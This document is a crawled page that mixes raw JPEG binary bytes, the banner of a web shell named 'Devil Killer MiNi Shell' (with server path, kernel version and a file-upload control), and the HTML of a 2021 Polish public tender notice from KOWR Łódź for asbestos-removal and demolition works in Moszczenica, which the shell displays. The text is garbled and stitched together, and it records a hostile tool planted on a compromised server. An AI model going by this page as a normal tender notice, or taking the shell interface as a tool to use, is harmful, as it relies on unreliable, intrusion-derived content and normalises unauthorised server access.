JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211021/0024155902-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty rozbiórkowe oraz remontowe związane z usuwaniem azbestu w Gospodarstwie Rolnym w Moszczenicy. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Wsparcia Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy w Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Północna</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">91-420</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.lodz@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kowr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa osoba prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarowanie Zasobem Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty rozbiórkowe oraz remontowe związane z usuwaniem azbestu w Gospodarstwie Rolnym w Moszczenicy. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-69069ddd-3270-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00241559</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007552/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Roboty budowlane (remont i rozbiórki) dotyczace budynków gospodarczych i inwentarskich w Gospodarstwie Rolnym w Moszczenicy gmina Moszczenica</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w niniejszym<br/>postępowaniu, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub<br/>oświadczeń między Zamawiającym a Wykonawcą odbywa się wyłącznie przy użyciu środków<br/>komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem<br/>https://kowr.eb2b.com.pl/. 2. Zamawiający może komunikować się z Wykonawcami również za<br/>pomocą poczty elektronicznej, e-mail: zamowienia.publiczne.lodz@kowr.gov.pl, z poniższym<br/>zastrzeżeniem:2.1. Zamawiający dopuszcza możliwość składania dokumentów elektronicznych lub<br/>elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej na wskazany w pkt<br/>2 adres mailowy – Z WYŁĄCZENIEM OFERT WRAZ Z ZAŁĄCZNIKAMI, KTÓRE SĄ SKŁADANE<br/>TYLKO I WYŁĄCZNIE ZA POŚREDNICTWEM PLATFORMY ZAKUPOWEJhttps://kowr.eb2b.com.pl/.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Ofertę<br/>sporządza się w języku polskim i składa pod rygorem nieważności, w formie elektronicznej lub postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. 2. Do podpisywania<br/>dokumentów w postaci elektronicznej wymagane jest posiadanie kwalifikowanego podpisu<br/>elektronicznego, podpisu osobistego lub podpisu zaufanego.3. Zamawiający określa dopuszczalne<br/>formaty danych, w jakich należy sporządzać dane zawierające dokumenty tekstowe i tekstowograficzne:<br/>.doc, .docx, .pdf, .xls i .xlsx,; skompresowane dokumenty elektroniczne: .zip i .7z.4. Do<br/>elektronicznego podpisywania dokumentów elektronicznych przy pomocy kwalifikowanego podpisu<br/>elektronicznego stosuje się następujące formaty podpisów: XAdES, PAdES, CAdESlubASIC<br/>(Zamawiający preferuje stosowanie formatu podpisu PAdES dla plików w formacie .pdf oraz XAdES typ<br/>wewnętrzny otaczający dla plików w pozostałych dopuszczalnych formatach). UWAGA !!! W przypadku korzystania z formatu podpisu XAdES typ zewnętrzny należy pamiętać, żeby plik podpisu przekazać<br/>Zamawiającemu razem z plikiem podpisywanym.5. Do elektronicznego podpisywania dokumentów<br/>elektronicznych przy pomocy podpisu osobistego stosuje się następujące formaty podpisów: PAdES.<br/>6. Dokumenty elektroniczne po podpisaniu przy pomocy profilu zaufanego generowane są w formacie<br/>.xml i w takim formacie należy przesyłać je do Zamawiającego. 7. W przypadku, gdy dokumenty<br/>elektroniczne w postępowaniu, przekazywane przy użyciu środków komunikacji elektronicznej,<br/>zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16<br/>kwietnia 1993 o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913) Wykonawca w celu<br/>utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku,<br/>zgodnie z zapisami w Rozdziale V ust. I pkt. 8.Szczegółowa informacja na temat warunków<br/>technicznych i organizacyjnych zawarta jest w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">INFORMACJA O PRZETWARZANIU DANYCH<br/>OSOBOWYCH: Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej<br/>jako „RODO”, wszystkie osoby, które ubiegają się o udzielenie zamówienia/ złożyły ofertę.<br/>Zamawiający informuje, że: 1. ADMINISTRATOR DANYCH OSOBOWYCH Administratorem, czyli<br/>podmiotem decydującym o celach i środkach przetwarzania Pani/Pana danych osobowych, jest<br/>Krajowy Ośrodek Wsparcia Rolnictwa (zwany dalej KOWR) z siedzibą w Warszawie (01207) przy ul.<br/>Karolkowej 30. Z administratorem może się Pani/Pan skontaktować poprzez adres e-mail:<br/>kontakt@kowr.gov.pl lub pisemnie na adres korespondencyjny: Krajowy Ośrodek Wsparcia Rolnictwa,<br/>ul. Karolkowa 30, 01-207 Warszawa. 2. INSPEKTOR OCHRONY DANYCH OSOBOWYCH W KOWR<br/>wyznaczono Inspektora Ochrony Danych Osobowych, z którym może się Pani/Pan skontaktować w<br/>sprawach ochrony i przetwarzania swoich danych osobowych pod adresem e-mail: iodo@kowr.gov.pl<br/>lub pisemnie na adres naszej siedziby, wskazany w ust. 1. 3. CELE I PODSTAWY PRAWNE<br/>PRZETWARZANIA DANYCH OSOBOWYCH Pani/Pana dane osobowe przetwarzane będą w celach<br/>związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym na podstawie<br/>ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych – Dz.U. z 2019 r. poz. 2019 z póżn.<br/>zm. (dalej PZP), w celach związanych z realizacją obowiązków administratora jako Zamawiającego,<br/>które wynikają z obowiązujących przepisów prawa. Pani/Pana dane osobowe przetwarzane będą także<br/>w celu realizacji obowiązku prowadzenia ewidencji korespondencji i archiwizacji dokumentacji zgodnie<br/>z ustawą z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz.<br/>164 z późn. zm.). 4. ODBIORCY DANYCH OSOBOWYCH Pani/Pana dane pozyskane w związku z<br/>postępowaniem o udzielenie zamówienia publicznego przekazywane będą wszystkim<br/>zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia<br/>publicznego jest jawne. Ograniczenie dostępu do Pani/Pana danych, o których mowa wyżej może<br/>wystąpić jedynie w szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, zgodnie<br/>z art. 18 ust 5 pkt 1 i 2 PZP. Pani/Pana dane osobowe mogą być udostępniane innym osobom lub<br/>podmiotom jeżeli obowiązek taki będzie wynikać z przepisów prawa. Do Pani/Pana danych mogą też<br/>mieć dostęp podmioty przetwarzające dane w naszym imieniu, np. podmioty świadczące pomoc<br/>prawną, usługi informatyczne, usługi niszczenia dokumentów, jak również inni administratorzy danych<br/>osobowych przetwarzający dane we własnym imieniu, np. podmioty prowadzące działalność pocztową<br/>lub kurierską. 5. OKRES PRZETWARZANIA DANYCH OSOBOWYCH Pani/Pana dane osobowe będą przetwarzane przez okres przewidziany przepisami prawa w tym zakresie, w tym przez okres<br/>przechowywania dokumentacji określony w przepisach powszechnych i uregulowaniach wewnętrznych<br/>KOWR w zakresie archiwizacji dokumentów, okres przedawnienia roszczeń przysługujących KOWR i<br/>w stosunku do niego. Dokumentacja dotycząca postępowania o udzielenie zamówienia publicznego<br/>będzie przechowywana, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, licząc od dnia 1 stycznia roku następnego po dniu zakończenia<br/>postępowania, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały<br/>czas trwania umowy. 6. INFORMACJA O WYMOGU/DOBROWOLNOŚCI PODANIA DANYCH<br/>OSOBOWYCH Podanie Pani/Pana danych osobowych w związku z udziałem w postępowaniu o<br/>udzielenie zamówienia ma charakter dobrowolny, ale jest niezbędne do wzięcia w nim udziału. Ciąg<br/>dalszy RODO w Pozostałych informacjach niniejszego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ŁÓD.WOP.260.2.2021.JGU</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 296400,28 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Roboty budowlane w Gospodarstwie Rolnym w Moszczenicy obejmujące roboty rozbiórkowe oraz remontowe związane z usuwaniem azbestu. <br/>Zadanie I) prowadzenie robót budowlanych – remontu 3 budynków typu wiata zlokalizowanych na dz. nr ewid. 1040/8 obrębu Moszczenica gmina Moszczenica powiat piotrkowski.<br/>Zadanie II) prowadzenie robót budowlanych – rozbiórki 4 budynków typu inwentarskiego (tzw. pawilony lisie) oraz 2 innych obiektów budowlanych zlokalizowanych na dz. nr ewid. 1040/8 obrębu Moszczenica gmina Moszczenica powiat piotrkowski. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo.<br/>A.	CENA [C] – 65 % Oferta o najniższej cenie uzyska największą ilość punktów, pozostałe proporcjonalnie mniej. <br/>B.	TERMIN REALIZACJI [T] – 30% Oferta z najkrótszym terminem realizacji uzyska największą ilość punktów, pozostałe proporcjonalnie mniej - do 35 dni kalendarzowych (termin podstawowy): 0,00 pkt<br/>- do 28 dni kalendarzowych: 14,00 pkt<br/>- do 21 dni kalendarzowych: 30,00 pkt.<br/>C.	GWARANCJA JAKOŚCI (dot. obiektów remontowanych) [G] – 5% Oferta o najdłuższej gwarancji jakości uzyska największą ilość punktów, pozostałe proporcjonalnie mniej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">65</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN REALIZACJI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">GWARANCJA JAKOŚCI (dot. obiektów remontowanych)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a)	w zakresie zdolności do występowania w obrocie gospodarczym - Zamawiający nie stawia warunku w tym zakresie;<br/>b)	w zakresie uprawnień do prowadzenia określonej działalności gospodarczej - Zamawiający nie stawia warunku w tym zakresie;<br/>c)	w zakresie sytuacji ekonomicznej lub finansowej - o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą że są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności tożsamej z przedmiotem zamówienia na kwotę gwarancyjną nie mniejszą niż 500 000,00 zł – weryfikacja na podstawie złożonego na wezwanie dokumentu.<br/>d)	w zakresie zdolności technicznej lub zawodowej – o udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, którzy wykażą, że wykonali roboty budowlane tożsame z przedmiotem zamówienia tj. co najmniej 1 robotę budowlaną rozbiórkową oraz 1 robotę budowlaną polegającą na remoncie/modernizacji/przebudowie dachów wraz z wymianą pokrycia dachowego oraz dysponują osobami zdolnymi do wykonania zamówienia tj. – kierownikiem robót posiadającym uprawnienia zawodowe do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej oraz przynależącego do OIIB. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- Polisa OC lub inny dokument, potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia na kwotę gwarancyjną nie mniejszą niż 500 000,00 zł <br/>- wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>- wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga zabezpieczenia oferty wadium w kwocie 3500,00 zł.<br/>a)	Wadium należy wnieść przed upływem terminu składania ofert i utrzymać nieprzerwanie do upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 ustawy,<br/>b)	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>- pieniądzu przelewem na rachunek bankowy Krajowego Ośrodka Wsparcia Rolnictwa OT Łódź nr 37 1130 1163 0014 7124 8320 0002, w tytule przelewu należy podać: „wadium – nr postępowania: ŁÓD.WOP.260.2.2021.JGU; Roboty rozbiórkowe oraz remontowe związane z usuwaniem azbestu w Gospodarstwie Rolnym w Moszczenicy”,<br/>- gwarancjach bankowych,<br/>- gwarancjach ubezpieczeniowych,<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>c) Wadium wnoszone w formach określonych w pkt b) tiret 2-4 musi:<br/>- wskazywać gwaranta lub poręczyciela (nazwa podmiotu udzielającego gwarancji lub poręczenia),<br/>- wskazywać Beneficjenta – Krajowy Ośrodek Wsparcia Rolnictwa OT Łódź;<br/>- określać termin obowiązywania gwarancji lub poręczenia, który musi obejmować okres związania ofertą;<br/>- określać kwotę poręczenia lub gwarancji (musi być równa kwocie wadium);<br/>- gwarantować wypłatę należności w sposób nieodwołalny, bezwarunkowy i na pierwsze pisemne żądanie;<br/>- wskazywać przyczyny zatrzymania wadium przez Zamawiającego, określone w art. 98 ust. 6 ustawy.<br/>d) Wadium w formie, o której mowa w pkt b) tiret 1, zostanie uznane jako wniesione, jeżeli zostanie zaksięgowane przez Bank na rachunku, o którym 